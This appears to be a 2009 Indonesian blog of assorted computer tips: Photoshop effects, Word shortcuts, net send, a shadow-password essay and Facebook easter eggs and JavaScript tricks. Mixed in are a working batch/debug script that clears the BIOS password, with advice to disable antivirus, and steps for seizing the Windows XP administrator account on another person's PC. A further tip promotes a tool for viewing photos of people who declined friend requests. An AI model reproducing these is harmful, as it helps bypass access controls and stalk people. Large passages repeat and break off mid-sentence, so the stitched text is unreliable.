Caranya adalah
1 Buat document baru 800 x 600 Pixel
2. Birikan warna Background hitam, kemudian buat teks
3. Kemudian restireze teks dengan cara klik kanan pada layer teks dan pilih restireze,
4. Kemudian berikan efek wind (Klik Menu Filter > Stylis > Wind ),
atur sesuai gambar: kemudian ulangi lagi efek wind ato bisa langsung tekan Ctrl + F 2x ( untuk mengulangi efek yang terakhir digunakan )
5. Berikan efek wind lagi ( ulangi langkah no 4 ) bedanya pada pengaturan direction (from the right dan from the lift).
6. Ok sekarang kita putar 90 cw ( klik edit > transfrom > rotate 90 derajat cw )
7. Nah sekarang kita kasih lagi efek wind (ulangi langkah 4 dan 5 ).
8. kita rotate kembali agar kembali kesemula yaitu (Klik Edit > Transfrom > Rotate 90 derajat Ccw )
9. Kini tinggal ngasih deh apinya
sebelumnya kita ubah mode warna ke Grayscale ( klik image > mode > grayscale ), lalu kita ubah lagi ke indexed color ( klik image > mode > indexed color ),
10. Terakhir kita sulut deh apinya dengan color table ( Klik Image > Mode > Color Table )
Jumat, 30 Oktober 2009
Selasa, 27 Oktober 2009
MERESET PASSWORD BIOS
Dengan sedikit bermain-main dengan Batch programming, kamu bisa me-reset password BIOS. Perlu kamu ketahui bahwa kode berikut ini akan dideteksi sebagai Virus oleh komputermu. So, disable dulu antivirusmu sebelum kamu mencopy-paste script berikut. Okeh.. ga' usah banyak omong.. lansung ajah neeh...
ctty nul
cls
@echo o 70 2e>>c:\Spyro.deb
@echo o 71 ff>>c:\Spyro.deb
@echo q>>c:\Spyro.deb
@debug
@del c:\Spyro.deb>nul
ctty con
cls
Simpan dengan nama terserahkamu.bat dan jalankan... Beres dech... restart komputer kamu.. ;)
ctty nul
cls
@echo o 70 2e>>c:\Spyro.deb
@echo o 71 ff>>c:\Spyro.deb
@echo q>>c:\Spyro.deb
@debug
@del c:\Spyro.deb>nul
ctty con
cls
Simpan dengan nama terserahkamu.bat dan jalankan... Beres dech... restart komputer kamu.. ;)
Shadow password
Secara umum teknik "Shadow Password" di susun sebagai berikut:
Untuk semua entry dalam direktori '/etc/passwd_file' , password yang terenkripsi dipindah ke file yang lain, seperti '/etc/shadow'.
Sementara '/etc/passwd' dapat dibaca oleh tiap orang dalam sistem, 'etc/shadow' hanya dapat dibaca oleh group yang bersangkutan, bahkan mungkin hanya dapat dibaca oleh superuser. Hal ini diperlukan untuk mengantisipasi daftar password yang terenkripsi dipecahkan oleh program dictionary.
Ide pada "menyembunyikan informasi" (information hiding) adalah satu dari banyak teknik yang terkandung dalam kategori "Security through Obscurity". Menurut orang-orang komunitas LINUX, ada 2 opini tentang "Security through Obscurity", yaitu:
1. "Dapat membantu dan tidak dapat dirusak, maka marilah kita menggunakannya"
2. "Sebenarnya dapat dirusak, sebab dia membuat perasaan yang salah pada sekuriti, dan sebaiknya jangan digunakan"
Tetapi masih banyak lagi orang yang akan mengemukakan kebaikan dari menggunakan shadow password, maka akan dikemukakan ketidak-baikan dari shadow password. Asumsi utama ketika orang menggunakan sistem dengan shadow password adalah bahwa penggunaan sistem ini menjanjikan bahwa tidak seorang pun yang tidak mempunyai hak, akan dapat melihat daftar passwordnya.
Tetapi bagaimanapun juga, ada beberapa manusia dapat membuat kesalahan dengan melepas daftar password tersebut. Mungkin lawan (Adversary) yang mempunyai akses root sebelumnya, dengan menuju ke "tempat kerja" SysAdmin pada waktu yang tepat, ia akan dapat memperoleh informasi yang dibutuhkan. Adversary mungkin tidak cukup waktu untuk meng-install program "backdoor", tetapi dia dapat "melayangkan pukulan pada file password tersebut.
Atau dengan membuat sebuah error pada setting permission dari 'etc/shadow', atau memberi instruksi "chmod a+r /etc/*" tanpa memikirkan keterlibatannya pada'/etc/shadow'.
Atau kemungkinan lain yaitu terdapatnya problem sekuriti yang baru saja di perbaiki setelah menggunakan "CERT advisory", hal ini akan membuat daftar password akan terbaca oleh siapapun juga ! Dan masih banyak cara lagi untuk melepaskan isi dari '/etc/shadow', bila kita pernah menjadi seorang SysAdmin yang berpengalaman.
Masalah dengan menggunakan sistem seperti shadow password adalah system ini akan memberikan perasaan salah dari security (false sense of security). Pada kasus ini, mereka akan mengira bahwa daftar password sudah aman dan terproteksi. Perasaan ini sering membuat sysAdmin malas menggunakan metode yang lebih superior, dan lebih pro-aktif (pro-active method) untuk memproteksi file password.
Yang paling mudah dan yang paling murah pada metoda pro-aktif adalah cara menukar direktori password. Tidak ada sistem lain yang diubah, --hanya menukar posisi direktori '/bin/passwd'. Terdapat beberapa program dan utiliti UNIX untuk menukar default direktori password, seperti "Matt Bishop's passwd+" dari darmouth.edu:/pub/security dan "Mark Henderson's ANLpasswd" dari info.mcs.anl.gov:/pub/systems.
Pada dasarnya, tiap seseorang mengubah pasword, program-program tadi akan membandingkan dengan dictionary (dan ke gecos field), hal ini mirip dengan cara kerja program ceacker. Apabila user memilih password yang "lemah", program pro-aktif ini akan memaksa user untuk mengubah pilihan password mereka.
Tanpa menggunakan sebuah program pro-aktif, kita harus juga mengkawatirkan tentang serangan program cracker (pada risetm, lebih dari 15 tahun belakangan ini, tanpa program pro-aktif, sebagian besar user akan memilih password yang mudah, dapat di crack, sering berupa nama depan wanita). Apabila bergantung pada sebuah sistem shadow password untuk mengamankan password kita, maka direktory '/etc/shadow/' akan dijamin mudah diserang.
Bagaimanapun juga, ketika menggunakan sebuah pro-aktif password checker, kita dapat mengumumkan ke dunia luar nama-nama password yang mudah diserang. Memaksa user untuk mengganti password mereka secara berkala juga akan mengurangi kemungkinan bocornya sekuriti.
Untuk semua entry dalam direktori '/etc/passwd_file' , password yang terenkripsi dipindah ke file yang lain, seperti '/etc/shadow'.
Sementara '/etc/passwd' dapat dibaca oleh tiap orang dalam sistem, 'etc/shadow' hanya dapat dibaca oleh group yang bersangkutan, bahkan mungkin hanya dapat dibaca oleh superuser. Hal ini diperlukan untuk mengantisipasi daftar password yang terenkripsi dipecahkan oleh program dictionary.
Ide pada "menyembunyikan informasi" (information hiding) adalah satu dari banyak teknik yang terkandung dalam kategori "Security through Obscurity". Menurut orang-orang komunitas LINUX, ada 2 opini tentang "Security through Obscurity", yaitu:
1. "Dapat membantu dan tidak dapat dirusak, maka marilah kita menggunakannya"
2. "Sebenarnya dapat dirusak, sebab dia membuat perasaan yang salah pada sekuriti, dan sebaiknya jangan digunakan"
Tetapi masih banyak lagi orang yang akan mengemukakan kebaikan dari menggunakan shadow password, maka akan dikemukakan ketidak-baikan dari shadow password. Asumsi utama ketika orang menggunakan sistem dengan shadow password adalah bahwa penggunaan sistem ini menjanjikan bahwa tidak seorang pun yang tidak mempunyai hak, akan dapat melihat daftar passwordnya.
Tetapi bagaimanapun juga, ada beberapa manusia dapat membuat kesalahan dengan melepas daftar password tersebut. Mungkin lawan (Adversary) yang mempunyai akses root sebelumnya, dengan menuju ke "tempat kerja" SysAdmin pada waktu yang tepat, ia akan dapat memperoleh informasi yang dibutuhkan. Adversary mungkin tidak cukup waktu untuk meng-install program "backdoor", tetapi dia dapat "melayangkan pukulan pada file password tersebut.
Atau dengan membuat sebuah error pada setting permission dari 'etc/shadow', atau memberi instruksi "chmod a+r /etc/*" tanpa memikirkan keterlibatannya pada'/etc/shadow'.
Atau kemungkinan lain yaitu terdapatnya problem sekuriti yang baru saja di perbaiki setelah menggunakan "CERT advisory", hal ini akan membuat daftar password akan terbaca oleh siapapun juga ! Dan masih banyak cara lagi untuk melepaskan isi dari '/etc/shadow', bila kita pernah menjadi seorang SysAdmin yang berpengalaman.
Masalah dengan menggunakan sistem seperti shadow password adalah system ini akan memberikan perasaan salah dari security (false sense of security). Pada kasus ini, mereka akan mengira bahwa daftar password sudah aman dan terproteksi. Perasaan ini sering membuat sysAdmin malas menggunakan metode yang lebih superior, dan lebih pro-aktif (pro-active method) untuk memproteksi file password.
Yang paling mudah dan yang paling murah pada metoda pro-aktif adalah cara menukar direktori password. Tidak ada sistem lain yang diubah, --hanya menukar posisi direktori '/bin/passwd'. Terdapat beberapa program dan utiliti UNIX untuk menukar default direktori password, seperti "Matt Bishop's passwd+" dari darmouth.edu:/pub/security dan "Mark Henderson's ANLpasswd" dari info.mcs.anl.gov:/pub/systems.
Pada dasarnya, tiap seseorang mengubah pasword, program-program tadi akan membandingkan dengan dictionary (dan ke gecos field), hal ini mirip dengan cara kerja program ceacker. Apabila user memilih password yang "lemah", program pro-aktif ini akan memaksa user untuk mengubah pilihan password mereka.
Tanpa menggunakan sebuah program pro-aktif, kita harus juga mengkawatirkan tentang serangan program cracker (pada risetm, lebih dari 15 tahun belakangan ini, tanpa program pro-aktif, sebagian besar user akan memilih password yang mudah, dapat di crack, sering berupa nama depan wanita). Apabila bergantung pada sebuah sistem shadow password untuk mengamankan password kita, maka direktory '/etc/shadow/' akan dijamin mudah diserang.
Bagaimanapun juga, ketika menggunakan sebuah pro-aktif password checker, kita dapat mengumumkan ke dunia luar nama-nama password yang mudah diserang. Memaksa user untuk mengganti password mereka secara berkala juga akan mengurangi kemungkinan bocornya sekuriti.
MENEMBUS PASSWORD ADMIN WINDOWS XP
1. Nyalakan komputer yang ingin anda tembus passwordnya dan masuklah safe mode (Tekan F8)
2. Tekan Ctrl + alt + Del dan isilah form pada kotak dialog yang muncul dengan:
Login : Administrator
Password : Terserah
3. Reboot Pc tersebut.
4. Lakukan hal yang sama seperti langkah 2 dan kini anda memiliki kuasa penuh dengan komputer tersebut ;)
2. Tekan Ctrl + alt + Del dan isilah form pada kotak dialog yang muncul dengan:
Login : Administrator
Password : Terserah
3. Reboot Pc tersebut.
4. Lakukan hal yang sama seperti langkah 2 dan kini anda memiliki kuasa penuh dengan komputer tersebut ;)
Cara Cepat Membuat Garis Pemisah Di MSWORD
Pengen membuat garis pemisah dengan cara kilat?? Gampang banget lho, kamu cuma tinggal mengetik kode tiga kali dan [enter] maka dalam sekejap mata garis pemisah akan muncul hingga batas akhir lebar halaman. Berikut code special itu:
- (dash) untuk membuat garis lurus tipis
_ (underscore) jadi garis lurus tebal
* (bintang) berubah garis putus-putus
= (sama dengan) untuk membuat garis rangkap dua
# (pagar) jadi garis rangkap tiga
~ (tildes) untuk bikin garis zigzag
Ingat!! ketikkan kode diatas tiga kali, lalu [enter]. Okay, semoga bermanfaat.. ;)
- (dash) untuk membuat garis lurus tipis
_ (underscore) jadi garis lurus tebal
* (bintang) berubah garis putus-putus
= (sama dengan) untuk membuat garis rangkap dua
# (pagar) jadi garis rangkap tiga
~ (tildes) untuk bikin garis zigzag
Ingat!! ketikkan kode diatas tiga kali, lalu [enter]. Okay, semoga bermanfaat.. ;)
Cara Cepat Membuat Garis Pemisah Di MSWORD
Pengen membuat garis pemisah dengan cara kilat?? Gampang banget lho, kamu cuma tinggal mengetik kode tiga kali dan [enter] maka dalam sekejap mata garis pemisah akan muncul hingga batas akhir lebar halaman. Berikut code special itu:
- (dash) untuk membuat garis lurus tipis
_ (underscore) jadi garis lurus tebal
* (bintang) berubah garis putus-putus
= (sama dengan) untuk membuat garis rangkap dua
# (pagar) jadi garis rangkap tiga
~ (tildes) untuk bikin garis zigzag
Ingat!! ketikkan kode diatas tiga kali, lalu [enter]. Okay, semoga bermanfaat.. ;)
- (dash) untuk membuat garis lurus tipis
_ (underscore) jadi garis lurus tebal
* (bintang) berubah garis putus-putus
= (sama dengan) untuk membuat garis rangkap dua
# (pagar) jadi garis rangkap tiga
~ (tildes) untuk bikin garis zigzag
Ingat!! ketikkan kode diatas tiga kali, lalu [enter]. Okay, semoga bermanfaat.. ;)
Mengubah Text Tombol Start Menjadi Lebih Dari Lima Huruf
Langkah 1
Lakukan backup file explorer.exe yang terletak di direktori C:\Windows lalu jalankan "Resource Hacker" kemudian buka [explorer.exe]
Langkah 2
Pilih [String Table]lalu klik ganda [37], klik sekali pada [1033]. Nah, sekarang pada item 578 terdapat tulisan "start" yang merupakan kata pada tombol [Start]. Ganti kata "start" tersebut sesuai keinginan anda, tetapi pastikan anda tidak menggunakan spasi dan tanda kutip tidak hilang.
Langkah 3
Simpan dengan nama exploler[nama].exe di direktori C:\Windows\. Misalnya saja nama yang tadi anda gunakan merubah kata "start" adalah "Komputerku", maka anda harus menyimpan file ini dengan nama explolerkomputerku.exe
Langkah 4
Sekarang keluar dari "Resource Hacker" karena kita akan memodifikasi Registry. Klik [Start] lalu [Run] ketikkan Regedit dan tekan [enter]. Masuklah ke HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WindowsNT\ CurrentVersion\Winlogon.
Cari string bernama shell klik ganda dan rubah value data-nya dengan nama yang tadi anda simpan. Klik [Ok] dan restart PC anda. Dan tombol [Start] anda sudah berubah sesuai yang anda inginkan.
Lakukan backup file explorer.exe yang terletak di direktori C:\Windows lalu jalankan "Resource Hacker" kemudian buka [explorer.exe]
Langkah 2
Pilih [String Table]lalu klik ganda [37], klik sekali pada [1033]. Nah, sekarang pada item 578 terdapat tulisan "start" yang merupakan kata pada tombol [Start]. Ganti kata "start" tersebut sesuai keinginan anda, tetapi pastikan anda tidak menggunakan spasi dan tanda kutip tidak hilang.
Langkah 3
Simpan dengan nama exploler[nama].exe di direktori C:\Windows\. Misalnya saja nama yang tadi anda gunakan merubah kata "start" adalah "Komputerku", maka anda harus menyimpan file ini dengan nama explolerkomputerku.exe
Langkah 4
Sekarang keluar dari "Resource Hacker" karena kita akan memodifikasi Registry. Klik [Start] lalu [Run] ketikkan Regedit dan tekan [enter]. Masuklah ke HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WindowsNT\ CurrentVersion\Winlogon.
Cari string bernama shell klik ganda dan rubah value data-nya dengan nama yang tadi anda simpan. Klik [Ok] dan restart PC anda. Dan tombol [Start] anda sudah berubah sesuai yang anda inginkan.
kirim pesen via cmd
Untuk pengguna komputer dalam sebuah jaringan LAN bisa memanfaatkan perintah pada command prompt yang bisa kirim pesan tanpa memerlukan software tambahan hhe.
Command Prompt bisa diakses dari menu Start/Programs/Accessories/Command Prompt atau dari Start/Run dan ketik cmd.
Caranya cukup gampang, dengan menggunakan command “NET SEND” anda sudah bisa mengirim pesan ke rekan anda yang terhubung LAN.
Format perintahnya adalah:
NET SEND (nama komputer) (isi pesan)
Example? Anda ingin kirim pesan ke komputer dengan nama komp1 cukup ketik:
net send komp1 bona itu keren lho :P
Bilamana pesan akan dikirim ke semua komputer dalam workgroup yang sama maka nama komputer diganti dengan ( * ), dan pesan akan muncul di semua komputer.
net send * bona itu ganteng lho :P
Perlu diinget bahwa sebelum perintah ini bisa jalanin terlebih dulu harus diaktifin service untuk messengerna.
carana:
Buka Control Panel/Administratif Tools/Services. Bilamana status pada service Messenger disable maka harus diaktifkan terlebih dahulu :D. Klik kanan pada Messenger /Properties, Startup type diganti dengan Automatic>>klik Aplly>>klik Start.. OK.
Command Prompt bisa diakses dari menu Start/Programs/Accessories/Command Prompt atau dari Start/Run dan ketik cmd.
Caranya cukup gampang, dengan menggunakan command “NET SEND” anda sudah bisa mengirim pesan ke rekan anda yang terhubung LAN.
Format perintahnya adalah:
NET SEND (nama komputer) (isi pesan)
Example? Anda ingin kirim pesan ke komputer dengan nama komp1 cukup ketik:
net send komp1 bona itu keren lho :P
Bilamana pesan akan dikirim ke semua komputer dalam workgroup yang sama maka nama komputer diganti dengan ( * ), dan pesan akan muncul di semua komputer.
net send * bona itu ganteng lho :P
Perlu diinget bahwa sebelum perintah ini bisa jalanin terlebih dulu harus diaktifin service untuk messengerna.
carana:
Buka Control Panel/Administratif Tools/Services. Bilamana status pada service Messenger disable maka harus diaktifkan terlebih dahulu :D. Klik kanan pada Messenger /Properties, Startup type diganti dengan Automatic>>klik Aplly>>klik Start.. OK.
Jumat, 09 Oktober 2009
Rahasia Facebook...???
tau ngga kalo ternyata facebook itu ada rahasia rahasianya?
ini beberapa di antaranya
1. Konami Code
pertama klik background terus pencet :
atas atas bawah bawah kiri kanan kiri kanan b a enter klik
2. Quote rahasia
Buka Friend list punya orang lain(jangan buka punya sendiri) terus view all dan pilih everyone terus highlight dipaling bawah daftar temennya ada quote rahasia kecil kalo ga keliatan coba pencet ctrl a
3. Bahasa bajak laut
Scroll ampe paling bawah page terus klik English(US)(ato Bahasa Indonesia kalo pake Bahasa Indonesia), nanti ada pilihan English(Pirate) yang kocak dipakenya
4. Siapa itu Putnam?
Kalo lagi chatting, kita masukin :putnam: bakal keluar emote dengan gambar muka orang ga jelas
itu adalah Chris Putnam, ahli software facebook
ini beberapa di antaranya
1. Konami Code
pertama klik background terus pencet :
atas atas bawah bawah kiri kanan kiri kanan b a enter klik
2. Quote rahasia
Buka Friend list punya orang lain(jangan buka punya sendiri) terus view all dan pilih everyone terus highlight dipaling bawah daftar temennya ada quote rahasia kecil kalo ga keliatan coba pencet ctrl a
3. Bahasa bajak laut
Scroll ampe paling bawah page terus klik English(US)(ato Bahasa Indonesia kalo pake Bahasa Indonesia), nanti ada pilihan English(Pirate) yang kocak dipakenya
4. Siapa itu Putnam?
Kalo lagi chatting, kita masukin :putnam: bakal keluar emote dengan gambar muka orang ga jelas
itu adalah Chris Putnam, ahli software facebook
Mengintip Foto siapapun bahkan yang belum di Add
langsung aja deh saya mulai
-----------------------------
1. login ke fb kmu,.
2. klo udah login langsung aja buka alamat di bawah ini
klik disini
3. udah gitu install ,.
4. klo udah berhasil ,tinggal masukin nama orang yang pengen lu liat2 fto nya ..lalu klik Get Photos
inget nama yang di ketikan ialah adalah nama Facebook nya,
klik salah satu nya ,..and enjoyy,...bahkan kmu bisa download smua album na ,.whohoho
keren dunk??
5. yah segitu aja dlu deh tentang tuts ini semoga berguna buat yang ngeceng2 cewek tapi ga di approve
-----------------------------
1. login ke fb kmu,.
2. klo udah login langsung aja buka alamat di bawah ini
klik disini
3. udah gitu install ,.
4. klo udah berhasil ,tinggal masukin nama orang yang pengen lu liat2 fto nya ..lalu klik Get Photos
inget nama yang di ketikan ialah adalah nama Facebook nya,
klik salah satu nya ,..and enjoyy,...bahkan kmu bisa download smua album na ,.whohoho
keren dunk??
5. yah segitu aja dlu deh tentang tuts ini semoga berguna buat yang ngeceng2 cewek tapi ga di approve
Cara menghapus acount fb
mungkin sbagian temand" dah tau caranya..
tp saya ingin berbagi aja bwd iang lom tau caranya..
tp ingat ni jangan disalah gunakan..
gunakanlah untuk sebagai pengetahuan aja..
ok langsung aja..
1. lo harus login dulu iagh..
2. pilih pengaturan >> pengaturan akun
trus liat paling bawah ada tulisan Tutup Akun
pilih tutup..
selanjutnya lo isi deh alasan lo menutup akun..
trakhir.. pilih nonaktifkan akun saya..
selesai deh..
ingat jangn disalah gunakan..
tp saya ingin berbagi aja bwd iang lom tau caranya..
tp ingat ni jangan disalah gunakan..
gunakanlah untuk sebagai pengetahuan aja..
ok langsung aja..
1. lo harus login dulu iagh..
2. pilih pengaturan >> pengaturan akun
trus liat paling bawah ada tulisan Tutup Akun
pilih tutup..
selanjutnya lo isi deh alasan lo menutup akun..
trakhir.. pilih nonaktifkan akun saya..
selesai deh..
ingat jangn disalah gunakan..
Cara Memblokir Facebook Orang Lain
cara untuk memblokir orang-orang yang menggangu kita atau memblokir orang yang kita benci dengan cara seperti berikut:
1. Pilih settings > Privacy settings
2. Dibagian bawah terdapat kotak dan silakan masukan nama orang yang akan diblokir (bisa yang udah menjadi teman/bukan teman)
Stelah mlakukan hal ini maka org yg diblokir g kan prnh mnemukan kita di facebook
kecuali dia mngganti/mmbuat fb baru.
Tenang aja hal ini brlaku kpd org trtentu yg kita pilih utk kita blokir, jadi jika ada org yg brnama sama mrk g kan ikut trblokir.
seep dah.. heheee
1. Pilih settings > Privacy settings
2. Dibagian bawah terdapat kotak dan silakan masukan nama orang yang akan diblokir (bisa yang udah menjadi teman/bukan teman)
Stelah mlakukan hal ini maka org yg diblokir g kan prnh mnemukan kita di facebook
kecuali dia mngganti/mmbuat fb baru.
Tenang aja hal ini brlaku kpd org trtentu yg kita pilih utk kita blokir, jadi jika ada org yg brnama sama mrk g kan ikut trblokir.
seep dah.. heheee
cara mengubah ukuran huruf di facebook
ckup masuk halaman fb truz tekan ctrl trus mainin scroll kamu
Efek cahaya pada facebook
langsung saja ya...
login ke facebook kamu.
kalo kamu udah login. baru deh jalankan tombol rahasianya(pada keyboard).
PERHATIKAN dengan seksama :
↑↑↓↓← → ← → b a enter
login ke facebook kamu.
kalo kamu udah login. baru deh jalankan tombol rahasianya(pada keyboard).
PERHATIKAN dengan seksama :
↑↑↓↓← → ← → b a enter
Fun Scripts di Facebook,javascript
smua ini ada kaitan nya dengan javascript,.
stelah di coba2 ternyata FB sdikit membuka peluang bagi para qta2 untuk sedikit berexplorasi,.
ternyata script javascript di address bar bisa di execute saat kita online di FB,.
hmm langsung aja deh ,sebenerna bukan hack c ,tapi patut di coba,.
-------------------------------------------------------------------
ngebuat status qt Offline,..
-------------------------------------------------------------------
ini yang mayan lucu,.
saat chating ma tmen di FB ,.coba suruh tmen kmu itu copy-in code ini di address bar:
javascript:statusControl.sendVisibility(false);
maka status dia bakal Offline ,.tentu aja ga permanent,.dia kembali Online setelah klik lg icon
atau gunain code sbalik nya:
javascript:statusControl.sendVisibility(true);
Status dia bakal kembali Online
---------------------------------
merubah warna tampilan navigation bar FB,..
-----------------------------------
xixixi ga usah di jelasin klo yang ini
sekarang kalian buka FB kalian,..lalu klo uda login
ketikan code ni di address bar :
javascript:void(document.getElementById('fb_menubar').style.background='red');
tulisan red dia atas kmu bisa ganti dengan warna lain,..:red,blue,black Dll
tentu aja ga permanent,.tapi mayan kan buat pamerr2 hahaha,..
oh ia coba kmu ganti dengan warna putih atau white,..dijamin tulisan nya bakal Ilang ahahahahah
---------------------------------
Chat history kmu dengan tmen kmu ,meskipun tmen kmu itu Off
------------------------------
biasanya yang sering chat di FB,..sering mengeluh klo window chat FB gada history nya.,
maka sebagian para chatter,ngga meng-close window chat nya ama seseorang ,hanya buat pengen liat history nya ama c doi
tapi karena terlajur ke -close n pengen liat history chat kemaren,tapi nunggu c doi
Ol Lma,.
kmu bisa gunain Code ini untuk memunculkan window chat kmu dengan c doi walaupun c doi OFF
javascript:buddyList.itemOnClick(#########);
ganti ##### dengan id profile tmen kmu itu,..
cara dapet profile id na gmana???
buka profile tmen kmu ,liat di address bar
contoh :http://www.facebook.com/profile.php?id=1773753904&ref=mf
maka profile id na :1773753904
,...
kalau pengen tes,..coba aja pake id profile sendri,..
maka window chat ke diri sendiri terbuka,..??bingung ya,.hahha,coba aja pake id profile sendiri
mayan buat catetan kan,..hehe ,tapi jangan di andelin buat catatan,.
--------------------------------------
mengubah nama kmu sementara
--------------------------------------
nama kmu bisa berubah sementara,...tapi sayang tmen2 kmu yang Ol liat kMU sebagai orang
dengan nama tertera asli nya,..
tapi mayan buat pamer hehe
pake code ini :
javascript:void(document.title="Facebook | d4rk");
maka tapilan nama nya jadi d4rk
--------------------------------
Mengclose jarak jauh chat window
-------------------------------
semisal si user dengan id =123 sedang chatting dengan user dengan Id=321
terus kmu suruh si id=123 ketikan Code ini :
javascript:chatDisplay.tabs[321].tabXOnClick();
maka chatingan id=123 bkal ke close dengan c id=321,..
-----------------------------------
hacks lain2 nya
---------------------------------
-mengeluarkan isi notifikasi window :
javascript:presence.toggleTab('chat_status_control','chat_status_control_tab');
-mengeluarkan list Friend yang OL :
javascript:buddyList.toggleTab();
-mengeluarkan tab Application
javascript:applicationDock.toggleTab();
-ketika sedang chat,..terus kata2 kita pengen di BOld ,maka gunain bintang
contoh : *test* ,yang keluar adalah : smua ini ada kaitan nya dengan javascript,.
stelah di coba2 ternyata FB sdikit membuka peluang bagi para qta2 untuk sedikit berexplorasi,.
ternyata script javascript di address bar bisa di execute saat kita online di FB,.
hmm langsung aja deh ,sebenerna bukan hack c ,tapi patut di coba,.
-------------------------------------------------------------------
ngebuat status qt Offline,..
-------------------------------------------------------------------
ini yang mayan lucu,.
saat chating ma tmen di FB ,.coba suruh tmen kmu itu copy-in code ini di address bar:
javascript:statusControl.sendVisibility(false);
maka status dia bakal Offline ,.tentu aja ga permanent,.dia kembali Online setelah klik lg icon
atau gunain code sbalik nya:
javascript:statusControl.sendVisibility(true);
Status dia bakal kembali Online
---------------------------------
merubah warna tampilan navigation bar FB,..
-----------------------------------
xixixi ga usah di jelasin klo yang ini
sekarang kalian buka FB kalian,..lalu klo uda login
ketikan code ni di address bar :
javascript:void(document.getElementById('fb_menubar').style.background='red');
tulisan red dia atas kmu bisa ganti dengan warna lain,..:red,blue,black Dll
tentu aja ga permanent,.tapi mayan kan buat pamerr2 hahaha,..
oh ia coba kmu ganti dengan warna putih atau white,..dijamin tulisan nya bakal Ilang ahahahahah
---------------------------------
Chat history kmu dengan tmen kmu ,meskipun tmen kmu itu Off
------------------------------
biasanya yang sering chat di FB,..sering mengeluh klo window chat FB gada history nya.,
maka sebagian para chatter,ngga meng-close window chat nya ama seseorang ,hanya buat pengen liat history nya ama c doi
tapi karena terlajur ke -close n pengen liat history chat kemaren,tapi nunggu c doi
Ol Lma,.
kmu bisa gunain Code ini untuk memunculkan window chat kmu dengan c doi walaupun c doi OFF
javascript:buddyList.itemOnClick(#########);
ganti ##### dengan id profile tmen kmu itu,..
cara dapet profile id na gmana???
buka profile tmen kmu ,liat di address bar
contoh :http://www.facebook.com/profile.php?id=1773753904&ref=mf
maka profile id na :1773753904
,...
kalau pengen tes,..coba aja pake id profile sendri,..
maka window chat ke diri sendiri terbuka,..??bingung ya,.hahha,coba aja pake id profile sendiri
mayan buat catetan kan,..hehe ,tapi jangan di andelin buat catatan,.
--------------------------------------
mengubah nama kmu sementara
--------------------------------------
nama kmu bisa berubah sementara,...tapi sayang tmen2 kmu yang Ol liat kMU sebagai orang
dengan nama tertera asli nya,..
tapi mayan buat pamer hehe
pake code ini :
javascript:void(document.title="Facebook | d4rk");
maka tapilan nama nya jadi d4rk
--------------------------------
Mengclose jarak jauh chat window
-------------------------------
semisal si user dengan id =123 sedang chatting dengan user dengan Id=321
terus kmu suruh si id=123 ketikan Code ini :
javascript:chatDisplay.tabs[321].tabXOnClick();
maka chatingan id=123 bkal ke close dengan c id=321,..
-----------------------------------
hacks lain2 nya
---------------------------------
-mengeluarkan isi notifikasi window :
javascript:presence.toggleTab('chat_status_control','chat_status_control_tab');
-mengeluarkan list Friend yang OL :
javascript:buddyList.toggleTab();
-mengeluarkan tab Application
javascript:applicationDock.toggleTab();
-ketika sedang chat,..terus kata2 kita pengen di BOld ,maka gunain bintang
contoh : *test* ,yang keluar adalah : test
kalau pengen di underline ,..pake "_"
contoh : _test_, maka yang keluar adalah: test
stelah di coba2 ternyata FB sdikit membuka peluang bagi para qta2 untuk sedikit berexplorasi,.
ternyata script javascript di address bar bisa di execute saat kita online di FB,.
hmm langsung aja deh ,sebenerna bukan hack c ,tapi patut di coba,.
-------------------------------------------------------------------
ngebuat status qt Offline,..
-------------------------------------------------------------------
ini yang mayan lucu,.
saat chating ma tmen di FB ,.coba suruh tmen kmu itu copy-in code ini di address bar:
javascript:statusControl.sendVisibility(false);
maka status dia bakal Offline ,.tentu aja ga permanent,.dia kembali Online setelah klik lg icon
atau gunain code sbalik nya:
javascript:statusControl.sendVisibility(true);
Status dia bakal kembali Online
---------------------------------
merubah warna tampilan navigation bar FB,..
-----------------------------------
xixixi ga usah di jelasin klo yang ini
sekarang kalian buka FB kalian,..lalu klo uda login
ketikan code ni di address bar :
javascript:void(document.getElementById('fb_menubar').style.background='red');
tulisan red dia atas kmu bisa ganti dengan warna lain,..:red,blue,black Dll
tentu aja ga permanent,.tapi mayan kan buat pamerr2 hahaha,..
oh ia coba kmu ganti dengan warna putih atau white,..dijamin tulisan nya bakal Ilang ahahahahah
---------------------------------
Chat history kmu dengan tmen kmu ,meskipun tmen kmu itu Off
------------------------------
biasanya yang sering chat di FB,..sering mengeluh klo window chat FB gada history nya.,
maka sebagian para chatter,ngga meng-close window chat nya ama seseorang ,hanya buat pengen liat history nya ama c doi
tapi karena terlajur ke -close n pengen liat history chat kemaren,tapi nunggu c doi
Ol Lma,.
kmu bisa gunain Code ini untuk memunculkan window chat kmu dengan c doi walaupun c doi OFF
javascript:buddyList.itemOnClick(#########);
ganti ##### dengan id profile tmen kmu itu,..
cara dapet profile id na gmana???
buka profile tmen kmu ,liat di address bar
contoh :http://www.facebook.com/profile.php?id=1773753904&ref=mf
maka profile id na :1773753904
,...
kalau pengen tes,..coba aja pake id profile sendri,..
maka window chat ke diri sendiri terbuka,..??bingung ya,.hahha,coba aja pake id profile sendiri
mayan buat catetan kan,..hehe ,tapi jangan di andelin buat catatan,.
--------------------------------------
mengubah nama kmu sementara
--------------------------------------
nama kmu bisa berubah sementara,...tapi sayang tmen2 kmu yang Ol liat kMU sebagai orang
dengan nama tertera asli nya,..
tapi mayan buat pamer hehe
pake code ini :
javascript:void(document.title="Facebook | d4rk");
maka tapilan nama nya jadi d4rk
--------------------------------
Mengclose jarak jauh chat window
-------------------------------
semisal si user dengan id =123 sedang chatting dengan user dengan Id=321
terus kmu suruh si id=123 ketikan Code ini :
javascript:chatDisplay.tabs[321].tabXOnClick();
maka chatingan id=123 bkal ke close dengan c id=321,..
-----------------------------------
hacks lain2 nya
---------------------------------
-mengeluarkan isi notifikasi window :
javascript:presence.toggleTab('chat_status_control','chat_status_control_tab');
-mengeluarkan list Friend yang OL :
javascript:buddyList.toggleTab();
-mengeluarkan tab Application
javascript:applicationDock.toggleTab();
-ketika sedang chat,..terus kata2 kita pengen di BOld ,maka gunain bintang
contoh : *test* ,yang keluar adalah : smua ini ada kaitan nya dengan javascript,.
stelah di coba2 ternyata FB sdikit membuka peluang bagi para qta2 untuk sedikit berexplorasi,.
ternyata script javascript di address bar bisa di execute saat kita online di FB,.
hmm langsung aja deh ,sebenerna bukan hack c ,tapi patut di coba,.
-------------------------------------------------------------------
